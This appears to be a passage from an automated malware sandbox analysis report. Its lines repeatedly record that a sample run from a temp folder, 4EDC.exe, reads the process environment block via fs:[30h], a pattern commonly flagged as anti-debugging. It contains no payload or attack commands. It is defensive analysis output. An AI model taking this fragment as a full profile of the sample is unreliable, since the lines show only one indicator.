Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 mov eax, dword ptr fs:[00000030h] 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov ecx, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA mov eax, dword ptr fs:[00000030h] 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA mov eax, dword ptr fs:[00000030h] 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0437F5 mov eax, dword ptr fs:[00000030h] 22_2_6C0437F5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C018800 mov eax, dword ptr fs:[00000030h] 22_2_6C018800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E009 mov eax, dword ptr fs:[00000030h] 22_2_6C00E009
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4015 mov eax, dword ptr fs:[00000030h] 22_2_6C0D4015
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4015 mov eax, dword ptr fs:[00000030h] 22_2_6C0D4015
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 mov eax, dword ptr fs:[00000030h] 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 mov eax, dword ptr fs:[00000030h] 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034020 mov edi, dword ptr fs:[00000030h] 22_2_6C034020
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C007055 mov eax, dword ptr fs:[00000030h] 22_2_6C007055
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F86D mov eax, dword ptr fs:[00000030h] 22_2_6C02F86D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1074 mov eax, dword ptr fs:[00000030h] 22_2_6C0D1074
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C2073 mov eax, dword ptr fs:[00000030h] 22_2_6C0C2073
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 mov eax, dword ptr fs:[00000030h] 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 mov eax, dword ptr fs:[00000030h] 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0138A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0138A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0138A4 mov ecx, dword ptr fs:[00000030h] 22_2_6C0138A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0490AF mov eax, dword ptr fs:[00000030h] 22_2_6C0490AF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov ecx, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov ecx, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov eax, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov eax, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 mov eax, dword ptr fs:[00000030h] 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 mov eax, dword ptr fs:[00000030h] 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 mov eax, dword ptr fs:[00000030h] 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 mov eax, dword ptr fs:[00000030h] 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B8E4 mov eax, dword ptr fs:[00000030h] 22_2_6C02B8E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B8E4 mov eax, dword ptr fs:[00000030h] 22_2_6C02B8E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0058EC mov eax, dword ptr fs:[00000030h] 22_2_6C0058EC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov ecx, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003138 mov ecx, dword ptr fs:[00000030h] 22_2_6C003138
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03513A mov eax, dword ptr fs:[00000030h] 22_2_6C03513A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03513A mov eax, dword ptr fs:[00000030h] 22_2_6C03513A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 mov eax, dword ptr fs:[00000030h] 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 mov eax, dword ptr fs:[00000030h] 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E mov eax, dword ptr fs:[00000030h] 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E mov eax, dword ptr fs:[00000030h] 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8966 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8966
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CE962 mov eax, dword ptr fs:[00000030h] 22_2_6C0CE962
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 mov eax, dword ptr fs:[00000030h] 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 mov eax, dword ptr fs:[00000030h] 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C182 mov eax, dword ptr fs:[00000030h] 22_2_6C02C182
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 mov eax, dword ptr fs:[00000030h] 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 mov ecx, dword ptr fs:[00000030h] 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03A185 mov eax, dword ptr fs:[00000030h] 22_2_6C03A185
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034190 mov eax, dword ptr fs:[00000030h] 22_2_6C034190
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032990 mov eax, dword ptr fs:[00000030h] 22_2_6C032990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E mov eax, dword ptr fs:[00000030h] 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E mov ecx, dword ptr fs:[00000030h] 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0361A0 mov eax, dword ptr fs:[00000030h] 22_2_6C0361A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0361A0 mov eax, dword ptr fs:[00000030h] 22_2_6C0361A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF mov eax, dword ptr fs:[00000030h] 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF mov eax, dword ptr fs:[00000030h] 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0031E0 mov eax, dword ptr fs:[00000030h] 22_2_6C0031E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0941E8 mov eax, dword ptr fs:[00000030h] 22_2_6C0941E8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D89E7 mov eax, dword ptr fs:[00000030h] 22_2_6C0D89E7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E9ED mov eax, dword ptr fs:[00000030h] 22_2_6C00E9ED
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD208 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD208
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD208 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD208
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C018A0A mov eax, dword ptr fs:[00000030h] 22_2_6C018A0A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov ecx, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C023A1C mov eax, dword ptr fs:[00000030h] 22_2_6C023A1C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 mov eax, dword ptr fs:[00000030h] 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 mov eax, dword ptr fs:[00000030h] 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08EA20 mov eax, dword ptr fs:[00000030h] 22_2_6C08EA20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002240 mov ecx, dword ptr fs:[00000030h] 22_2_6C002240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002240 mov eax, dword ptr fs:[00000030h] 22_2_6C002240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094248 mov eax, dword ptr fs:[00000030h] 22_2_6C094248
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094257 mov eax, dword ptr fs:[00000030h] 22_2_6C094257
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BB260 mov eax, dword ptr fs:[00000030h] 22_2_6C0BB260
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BB260 mov eax, dword ptr fs:[00000030h] 22_2_6C0BB260
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8A62 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8A62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04927A mov eax, dword ptr fs:[00000030h] 22_2_6C04927A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 mov eax, dword ptr fs:[00000030h] 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 mov eax, dword ptr fs:[00000030h] 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 mov eax, dword ptr fs:[00000030h] 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 mov eax, dword ptr fs:[00000030h] 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C001AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C035AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C035AA0
